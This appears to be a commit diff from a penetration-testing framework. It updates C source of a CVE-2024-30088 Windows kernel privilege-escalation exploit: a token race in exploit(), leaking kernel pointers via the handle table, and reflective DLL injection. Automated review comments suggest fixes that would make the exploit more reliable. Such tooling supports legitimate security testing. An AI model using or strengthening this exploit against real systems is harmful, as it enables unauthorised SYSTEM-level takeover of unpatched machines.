
Responded to comments
jheysel-r7 committed Aug 30, 2024
1 parent b322343 commit b011b67
Showing 4 changed files with 7 additions and 8 deletions.
Binary file modified data/exploits/CVE-2024-30088/CVE-2024-30088.x64.dll
Binary file not shown.
Expand Up @@ -2,7 +2,6 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN

#include "ReflectiveLoader.c"
#include <common.h>
#include <stdio.h>


Expand Up @@ -54,7 +54,7 @@ HANDLE hToken;
BYTE* TokenInfo = 0;
DWORD Infolen = 0x1000;
DWORD retlen = 0;
DWORD OffsetToName = 0;
INT64 OffsetToName = 0;
BYTE* RaceAddr = 0;
ULONGLONG kTokenAddr = 0;

Expand All @@ -75,7 +75,7 @@ HANDLE exploit() {

TokenInfo = (BYTE*)VirtualAlloc(0, Infolen, MEM_COMMIT, PAGE_READWRITE);
if (!TokenInfo)
return -1;
return INVALID_HANDLE_VALUE;

NTSTATUS status = pQueryInfoToken(hToken, (TOKEN_INFORMATION_CLASS)22, TokenInfo, Infolen, &retlen);

Expand All @@ -92,7 +92,7 @@ HANDLE exploit() {
}

if (!OffsetToName)
return -1;
return INVALID_HANDLE_VALUE;


RaceAddr = TokenInfo + OffsetToName;
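Review bot: Changing `OffsetToName` to a signed `INT64` (line 32) leaves the guard at line 48 checking only for zero, so a negative or oversized offset still reaches `RaceAddr = TokenInfo + OffsetToName;` and yields a pointer outside the `Infolen` (0x1000) byte `TokenInfo` allocation; the offset appears to be derived from the token data filled in by `pQueryInfoToken`, and the code that computes it lies between the hunks. A range check is cheap here: `if (OffsetToName <= 0 || (ULONGLONG)OffsetToName >= Infolen) return INVALID_HANDLE_VALUE;` (or bound by `retlen`, the length actually written, if that is checked earlier). Separately, returning `INVALID_HANDLE_VALUE` instead of `-1` is the right type for a `HANDLE` return, but it means every caller must test against that sentinel rather than `NULL`; since the callers are outside this diff, a one-line contract comment on the function would help: `// Returns INVALID_HANDLE_VALUE on failure; never NULL.` exploit()'s body begins and ends outside the hunks.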
Expand Up @@ -11,7 +11,7 @@
typedef struct _SYSTEM_HANDLE
{
PVOID Object;
HANDLE UniqueProcessId;
DWORD UniqueProcessId;
HANDLE HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
Expand Down Expand Up @@ -63,17 +63,17 @@ PVOID GetKernelPointerByHandle(HANDLE HandleValue)
for (int i = 0; i < pHandleInfo->HandleCount; i++) {
PVOID object = pHandleInfo->Handles[i].Object;
HANDLE handle = pHandleInfo->Handles[i].HandleValue;
HANDLE pid = pHandleInfo->Handles[i].UniqueProcessId;
DWORD pid = pHandleInfo->Handles[i].UniqueProcessId;

if ((DWORD)pid == CurrentPid && handle == HandleValue) {
if (pid == CurrentPid && handle == HandleValue) {
return object;
}

}
return 0;
}

ULONG GetPidByName(const wchar_t* procname) {
ULONG GetPidByName(const char* procname) {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
ULONG pid;
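Review bot: Narrowing `UniqueProcessId` in `struct _SYSTEM_HANDLE` from `HANDLE` to `DWORD` (line 61) alters a struct that is overlaid on the buffer `pHandleInfo->Handles[i]` is read from, which appears to mirror a kernel-defined layout in which this field is pointer-sized (`ULONG_PTR` in SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX); on x64 the following `HANDLE HandleValue` only stays at offset 16 because the compiler inserts 4 bytes of padding after the `DWORD`, which is fragile and would silently break under `#pragma pack`. The safer form keeps the field pointer-sized and casts at the comparison — `ULONG_PTR UniqueProcessId;` in the struct and `if (pid == (ULONG_PTR)CurrentPid && handle == HandleValue) {` in the loop — or at minimum pins the layout with `_Static_assert(sizeof(struct _SYSTEM_HANDLE) == 40, "SYSTEM_HANDLE layout mismatch");` for the x64 build. The `GetPidByName(const char* procname)` change assumes `PROCESSENTRY32`/`Process32First` resolve to their ANSI variants (the body where `szExeFile` is compared is outside the hunk); using `PROCESSENTRY32A` and `Process32FirstA`/`Process32NextA` explicitly would make that independent of the UNICODE build setting. GetKernelPointerByHandle starts before the hunk and GetPidByName continues past it.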
